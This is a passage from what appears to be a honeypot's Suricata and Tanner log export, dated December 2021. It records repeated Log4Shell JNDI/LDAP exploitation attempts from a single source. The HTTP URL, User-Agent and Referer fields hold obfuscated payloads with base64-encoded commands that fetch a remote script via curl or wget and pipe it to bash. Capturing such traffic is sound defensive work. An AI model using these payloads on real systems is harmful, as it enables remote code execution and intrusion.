Hx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",33924,,,,,,,,,,,,giantmole,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:04:00.789121+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T22:03:48.580Z",1,"LaL-un0BCXMCNTQLcBfL","logstash-suricata-2021.12.14",,"_doc","d50c261c-6ad0-46eb-8c0e-8508873fbb4e",ac08836c39e3,"b598c772-ad0a-4292-9c07-a8ceecf1daf5",ac08836c39e3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,944755714570695,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ac08836c39e3,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",13383,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",53667622,,"{""timestamp"":""2021-12-14T22:03:48.580127+0000"",""flow_id"":944755714570695,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":60626,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",60626,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:03:48.580127+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T22:03:48.580Z",1,"LqL-un0BCXMCNTQLcBfL","logstash-suricata-2021.12.14",,"_doc","d50c261c-6ad0-46eb-8c0e-8508873fbb4e",ac08836c39e3,"b598c772-ad0a-4292-9c07-a8ceecf1daf5",ac08836c39e3,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",60626,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (1673)",c9c65774fd2401c660a14616a73a1890,"[]",13383,CLOSED,false,0,,,,,,,944755714570695,"Digital Ocean, Inc.",14061,Bengaluru,AS,IN,IN,India,,"172.16.0.42","12.9771","{""lon"":77.5871,""lat"":12.9771}","77.5871",560100,KA,Karnataka,"Asia/Kolkata",,,,,,,,,,,,,,,ac08836c39e3,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",13383,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",53668747,,"{""timestamp"":""2021-12-14T22:03:48.580127+0000"",""flow_id"":944755714570695,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":60626,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":13383},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (1673)"",""gaps"":false,""state"":""CLOSED"",""md5"":""c9c65774fd2401c660a14616a73a1890"",""stored"":false,""size"":13383,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,easternfingernail,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T22:03:48.580127+0000",,,,,,,,,Suricata,,,,
"2021-12-14T22:03:48.383Z",1,"BaL-un0BCXMCNTQLcBj8","logstash-tanner-2021.12.14",,"_doc","d50c261c-6ad0-46eb-8c0e-8508873fbb4e",ac08836c39e3,"b598c772-ad0a-4292-9c07-a8ceecf1daf5",ac08836c39e3,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,ac08836c39e3,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",110258,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""5fe5df4a-55e7-414e-99f5-2d099e54f28a"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 60626}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""ac7abde2-2d07-433e-8c50-1edc6bd6edf0""}}}, ""timestamp"": ""2021-12-14T22:03:48.383954""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMTY4LjE0NDo4MCl8YmFzaA==}",,,,,,,,,,,index,1,1,"0.6.0","ac7abde2-2d07-433e-8c50-1edc6bd6edf0","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",60626,,,,,,,,,200,,,easternfingernail,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:03:48.383954",,,,,,,,,Tanner,,,"5fe5df4a-55e7-414e-99f5-2d099e54f28a",
"2021-12-14T22:03:12.869Z",1,"BnD-un0B6VkG8jKzOlto","logstash-suricata-2021.12.14",,"_doc","09468d6d-57e2-4354-9b16-9e52848cd3dc",96bf79c28576,"5af2ef16-a282-4682-8172-2777d69af947",96bf79c28576,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2141307831075882,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,96bf79c28576,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",132923532,,"{""timestamp"":""2021-12-14T22:03:12.869078+0000"",""flow_id"":2141307831075882,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":55770,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",55770,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:03:12.869078+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T22:03:12.869Z",1,"B3D-un0B6VkG8jKzOlto","logstash-suricata-2021.12.14",,"_doc","09468d6d-57e2-4354-9b16-9e52848cd3dc",96bf79c28576,"5af2ef16-a282-4682-8172-2777d69af947",96bf79c28576,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",55770,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (747)",f57e5b6f34eeacc1c32cb643fb59a98e,"[]",16240,CLOSED,false,0,,,,,,,2141307831075882,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,96bf79c28576,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",132924658,,"{""timestamp"":""2021-12-14T22:03:12.869078+0000"",""flow_id"":2141307831075882,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":55770,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (747)"",""gaps"":false,""state"":""CLOSED"",""md5"":""f57e5b6f34eeacc1c32cb643fb59a98e"",""stored"":false,""size"":16240,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T22:03:12.869078+0000",,,,,,,,,Suricata,,,,
"2021-12-14T22:03:12.516Z",1,"SHD-un0B6VkG8jKzOlvZ","logstash-tanner-2021.12.14",,"_doc","09468d6d-57e2-4354-9b16-9e52848cd3dc",96bf79c28576,"5af2ef16-a282-4682-8172-2777d69af947",96bf79c28576,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,96bf79c28576,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",66586,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""b9fbe464-ce2e-4ab4-bf3f-178439240ab3"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 55770}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""173e3b33-8a9c-44a1-8941-08b7ae7b447d""}}}, ""timestamp"": ""2021-12-14T22:03:12.516930""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzcuMTg0Ljg0LjIzNzo4MCl8YmFzaA==}",,,,,,,,,,,index,1,1,"0.6.0","173e3b33-8a9c-44a1-8941-08b7ae7b447d","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",55770,,,,,,,,,200,,,obviousweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:03:12.516930",,,,,,,,,Tanner,,,"b9fbe464-ce2e-4ab4-bf3f-178439240ab3",
"2021-12-14T22:02:58.890Z",1,"tKL-un0BCXMCNTQLaBOA","logstash-suricata-2021.12.14",,"_doc","b349ec7c-568b-4b15-8032-8cb715450d31",416d6adb7714,"18d8ffa9-baf7-4cdc-ba61-9eeefde07664",416d6adb7714,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2105827105324634,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,416d6adb7714,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",65332614,,"{""timestamp"":""2021-12-14T22:02:58.890008+0000"",""flow_id"":2105827105324634,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":43800,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE0OS4xMzA6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",43800,,,,,,,,,,,,healthycongresswoman,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:02:58.890008+0000",,,,,,,,0,Suricata,,,,
